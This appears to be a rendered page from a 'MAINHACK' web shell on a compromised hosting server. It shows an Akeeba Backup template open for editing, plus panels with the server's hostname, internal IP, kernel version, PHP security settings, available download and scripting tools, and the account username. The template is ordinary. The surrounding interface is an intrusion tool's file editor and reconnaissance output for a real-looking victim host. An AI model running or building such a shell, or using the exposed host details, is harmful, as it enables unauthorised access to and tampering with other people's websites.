[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: status.blade.php
<?php /** * @package solo * @copyright Copyright (c)2014-2025 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ use Akeeba\Engine\Factory; use Awf\Text\Text; defined('_AKEEBA') or die(); // Used for type hinting /** @var \Solo\View\Main\Html $this */ $router = $this->container->router; ?> <div class="akeeba-panel"> <header class="akeeba-block-header"> <h3>@lang('COM_AKEEBA_CPANEL_LABEL_STATUSSUMMARY')</h3> </header> <div> {{-- Backup status summary --}} {{ $this->statusCell }} {{-- Warnings --}} @if($this->countWarnings) <div> {{ $this->detailsCell }} </div> <hr/> @endif {{-- Version --}} <p class="ak_version"> @lang('SOLO_APP_TITLE') {{ AKEEBABACKUP_PRO ? 'Professional ' : 'Core' }} {{ AKEEBABACKUP_VERSION }} ({{ AKEEBABACKUP_DATE }}) </p> {{-- Changelog --}} <a href="#" id="btnchangelog" class="akeeba-btn--primary">CHANGELOG</a> <div id="akeeba-changelog" tabindex="-1" role="dialog" aria-hidden="true" style="display:none;"> <div class="akeeba-renderer-fef"> <div class="akeeba-panel--info"> <header class="akeeba-block-header"> <h3> @lang('CHANGELOG') </h3> </header> <div id="DialogBody"> {{ $this->formattedChangelog }} </div> </div> </div> </div> {{-- Donation CTA --}} @if( ! (AKEEBABACKUP_PRO)) <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=3NTKQ3M2DYPYW&source=url" class="akeeba-btn-green"> Donate via PayPal </a> @endif {{-- Pro upsell --}} @if(!AKEEBABACKUP_PRO && (time() - $this->lastUpsellDismiss < 1296000)) <p style="margin-top: 0.5em"> @if (!$this->getContainer()->segment->get('insideCMS', false)) <a href="https://www.akeeba.com/landing/akeeba-solo.html" class="akeeba-btn--ghost--small"> <span class="akion-ios-star"></span> @lang('COM_AKEEBA_CONTROLPANEL_BTN_LEARNMORE') </a> @else <a href="https://www.akeeba.com/landing/akeeba-backup-wordpress.html" class="akeeba-btn--ghost--small"> <span class="akion-ios-star"></span> @lang('COM_AKEEBA_CONTROLPANEL_BTN_LEARNMORE') </a> @endif </p> @endif </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697